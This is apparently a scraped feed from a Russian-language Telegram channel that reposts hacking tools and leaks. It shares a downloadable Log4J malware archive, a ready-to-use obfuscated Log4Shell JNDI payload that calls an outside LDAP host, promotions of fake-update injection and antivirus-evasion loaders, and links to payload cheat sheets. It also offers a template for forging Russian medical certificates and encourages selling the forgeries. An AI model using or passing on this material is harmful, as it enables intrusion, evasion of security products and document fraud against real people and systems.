C.I.T. Security – Telegram
C.I.T. Security
8.15K subscribers
2.83K photos
254 videos
4.2K files
4.1K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
Инф.войны и разведка: @cit_psyop
Курсы: @cit_course
Мусорка: https://news.1rj.ru/str/+WOFeU7VW2oYyZTI0
Боты пробива: @citsearchbot
@citsearch2bot
Download Telegram
Log4J Malware.7z
6.1 MB
Malware using LOG4J exploit:)

PWD - infected
Forwarded from Template User
Found a bypass working for a few WAF

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}

Good luck 🤞🏻
#log4j #Log4Shell #log4jRCE #bugbountytip
nse-log4shell

#Nmap NSE noscripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE noscripts check most popular exposed services on the Internet. It is basic noscript where you can customize payload.

https://github.com/Diverto/nse-log4shell

#log4j2 #log4jRCE #log4jRCE #bugbounty
Evilgrade

Modular Framework To Take Advantage Of Poor Upgrade Implementations By Injecting Fake Updates.

Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules.

Easy to set up new settings, and has an autoconfiguration when new binary agents are set.
When should I use evilgrade?

This framework comes into play when the attacker is able to make hostname redirections (manipulation of victim's dns traffic), and such thing can be done on 2 scenarios:

Internal scenery:
1. Internal DNS access
2. ARP spoofing
3. DNS Cache Poisoning
4. DHCP spoofing
5. TCP hijacking
6. Wi-Fi Access Point impersonation
External scenery:
1. Internal DNS access
2. DNS Cache Poisoning
How does it work?
Evilgrade works with modules, in each module there's an implemented structure which is needed to emulate a fake update for an specific application/system.

https://github.com/infobyte/evilgrade
CryptPad - приватный аналог Google Docs (с шифрованием).

Многие используют в повседневной жизни Google Docs, так как он практичен, все хранится в облаке и можно зайти и просмотреть нужные данные с любого устройства. Это все замечательно, но есть один нюанс - все ваши данные хранятся на Google серверах.

Но, как всегда есть альтернатива - CryptPad. Это онлайн коллаборативный редактор, котоpый взаимодействует с данными только в зашифрованном виде, а для разрешения конфликтов правoк использует блокчейн. Регистрация бесплатная, отлично работает из под Tor. По функционалу не уступает Google Docs.
👍1
Bypass AV & Advanced XDR solutions

Mortar Loader is able to bypass modern anti-virus products and advanced XDR solutions and it has been tested and confirmed bypass for the following:

— Kaspersky
— ESET
— Malewarebytes
— Mcafee
— Cortex XDR
— Windows defender
— Cylance

Research:
https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions

Source:
https://github.com/0xsp-SRD/mortar

#av #xdr #evasion #redteam
Netsparker-Standard-6.2.1.33642.7z
250.6 MB
Netsparker Standard 6.2.1.33642 - 14 December 2021

Added Out of Band Code Evaluation (Log4j) a.k.a. Log4Shell detection support.

VirusTotal - https://www.virustotal.com/gui/file/e94ff1dd74e96d97754e155733d2dd789feb83fed2e56d087cbfb273fa5d6c9c

changelog - https://www.netsparker.com/web-vulnerability-scanner/changelog/

#vuln #scanner
👍1
Как найди адрес почты по фамилии и имени

1. Открой эту таблицу Google
2. Выбери файл > копировать
3. В поле для ввода ФИО укажи что известно
4. Укажи в поле domain популярный почтовый сервис, пример: gmail.com, можно yandex.ru, mail.ru, rambler.ru, и yahoo.com
5. Наводи на адреса и смотри на картинки профиля.

Адрес НЕ существует если у профиля картинка со светло-голубым фоном.

Если не появляется окно с профилем, то обнови страницу
👍1
​​Anon starter pack V.2.

Продолжаю выкладывать подборки инструментов для анонов.

1. OnionShare 2.3.1 — утилита с открытым исходным кодом, обеспечивающая безопасный и анонимный обмен файлами любого размера.

2. dnscrypt-proxy — гибкая служба DNS прокси с поддержкой DNSCrypt, DNS-over-HTTPS, и Anonymized DNSCrypt, relay-протокола, который скрывает реальный IP адрес пользователя.

3. Scrambled Exif — приложение для удаления метаданных с фотографий перед их отправкой. Для пользователей Android.

4. Tribler — торрент-клиент, который позволяет скачивать файлы через цепочку серверов-посредников, подобно тому, как это происходит в сети Tor.

5. Dust — плюс один безопасный мессенджер с Е2Е шифрованием сообщений. Не хранит сообщения на смартфоне.

6. Orchid — VPN-сервис нового поколения, использующий блокчейн технологию и смарт контракты.

7. OrganicMaps — релиз форка Maps.me с открытым кодом. Ориентирован на приватность.

#приложение #анонимность #софт
👍1
Фейк_справка_Российской_Федерации.rar
6.5 MB
#слив

PSD-шаблон медицинской справки Российской Федерации 🇷🇺

В данном архиве содержится всё для создания справки, а именно: инструкция, образец, шрифты и сам шаблон для Photoshop. Устанавливаем шрифты, закидываем шаблон в фотошоп и заполняем справку.

Теперь вы можете "официально" прогуливать школу или даже подзаработать продавая справки в чатах услуг а-ля Lolz Team. Так же напоминаем о шаблонах для Республики Беларусь & Узбекистана.

Скриншот
Пароль на архив: @mamontyatina
👍1
Продолжается пополняться подборка полезных OSINT-инструментов от @cybdetective

https://github.com/cipher387/osint_stuff_tool_collection
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list

SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md

SSRF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

CRLF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection

CSV-Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection

Command Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

Directory Traversal
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal

LFI
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

XXE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md

Open-Redirect
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md

RCE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md

Crypto
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md

Template Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

XSLT
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md

Content Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md

LDAP Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection

NoSQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection

CSRF Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection

GraphQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection

IDOR
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References

ISCM
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management

LaTex Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection

OAuth
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth

XPATH Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection

Bypass Upload Tricky
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
STERRA - Инструмент SOCMINT для получения информации из аккаунта Instagram через его подписчиков / подписчиков.

https://github.com/novitae/sterraxcyl
Репозиторий с материалами цифровой криминалистики
[https://github.com/frankwxu/digital-forensics-lab]

Практические лаборатории и учебный материал по цифровой криминалистике, предназначенные для студентов и преподавателей

• Все кейсы основаны исключительно на Kali Linux
• Для каждого кейса есть презентация со скриншотами инструкций.
• Охватывает множество тем по цифровой криминалистике
• Все упоминаемые инструменты с открытым исходным кодом
• В наличии формализованные криминалистические экспертизы в файлах JSON

#forensic #linux #digital